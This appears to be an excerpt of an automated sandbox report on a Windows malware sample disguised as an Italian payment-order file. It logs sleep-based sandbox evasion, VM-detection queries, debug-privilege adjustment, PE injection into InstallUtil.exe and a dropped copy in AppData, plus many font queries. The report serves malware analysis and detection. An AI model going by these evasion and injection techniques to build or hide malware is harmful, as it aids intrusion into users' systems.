Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe TID: 6896	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe TID: 6448	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe TID: 7056	Thread sleep count: 34 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6332	Thread sleep time: -16602069666338586s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6384	Thread sleep count: 4815 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6384	Thread sleep count: 3802 > 30	Jump to behavior

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Window / User API: threadDelayed 4815			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Window / User API: threadDelayed 3802			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: InstallUtil.exe, 0000000B.00000002.698836717.00000000060F0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlln
Source: Controllo saldo 30% Ordine 5667.exe, 00000000.00000003.556467264.0000000003C9D000.00000004.00000800.00020000.00000000.sdmp, Controllo saldo 30% Ordine 5667.exe, 00000000.00000003.554735633.0000000003791000.00000004.00000800.00020000.00000000.sdmp, Vajejvz.exe, 0000000D.00000002.697971479.0000000003460000.00000004.00000800.00020000.00000000.sdmp, Vajejvz.exe, 0000000E.00000002.697735781.0000000003F60000.00000004.00000800.00020000.00000000.sdmp, Vajejvz.exe, 0000000E.00000002.699889310.000000000448D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: GSh58ZQeMu
Source: Vajejvz.exe, 0000000E.00000002.697735781.0000000003F60000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 3DcVMCIbwf
Source: Vajejvz.exe, 0000000E.00000002.703119704.0000000006FA3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}VJsC
Source: Controllo saldo 30% Ordine 5667.exe, 00000000.00000003.554735633.0000000003791000.00000004.00000800.00020000.00000000.sdmp, Vajejvz.exe, 0000000D.00000002.697971479.0000000003460000.00000004.00000800.00020000.00000000.sdmp, Vajejvz.exe, 0000000E.00000002.697735781.0000000003F60000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: qLXRDM0hGFSLiiWGy0h
Source: Vajejvz.exe, 0000000D.00000002.694302192.00000000007DE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Code function: 11_2_063E3CD8 LdrInitializeThunk,

11_2_063E3CD8

Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Writes to foreign memory regions

Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 436000	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 438000	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: A02008	Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5A

Jump to behavior

Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout 5	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 5	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout 5	Jump to behavior

Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation	Jump to behavior
